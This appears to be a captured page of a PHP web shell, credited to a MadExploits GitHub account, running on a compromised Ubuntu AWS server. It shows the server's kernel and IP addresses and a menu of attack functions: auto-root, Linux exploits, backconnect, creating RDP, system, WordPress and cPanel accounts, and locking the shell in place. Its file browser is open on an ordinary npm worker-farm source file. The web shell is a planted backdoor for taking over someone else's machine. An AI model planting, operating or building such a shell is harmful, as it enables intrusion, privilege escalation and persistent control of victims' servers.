Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.139.83.202
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
npm /
node_modules /
worker-farm /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
child
[ DIR ]
drwxr-xr-x
farm.js
9.46
KB
-rw-r--r--
fork.js
904
B
-rw-r--r--
index.js
691
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : fork.js
'use strict' const childProcess = require('child_process') , childModule = require.resolve('./child/index') function fork (forkModule, workerOptions) { // suppress --debug / --inspect flags while preserving others (like --harmony) let filteredArgs = process.execArgv.filter(function (v) { return !(/^--(debug|inspect)/).test(v) }) , options = Object.assign({ execArgv : filteredArgs , env : process.env , cwd : process.cwd() }, workerOptions) , child = childProcess.fork(childModule, process.argv, options) child.on('error', function() { // this *should* be picked up by onExit and the operation requeued }) child.send({ owner: 'farm', module: forkModule }) // return a send() function for this child return { send : child.send.bind(child) , child : child } } module.exports = fork
Close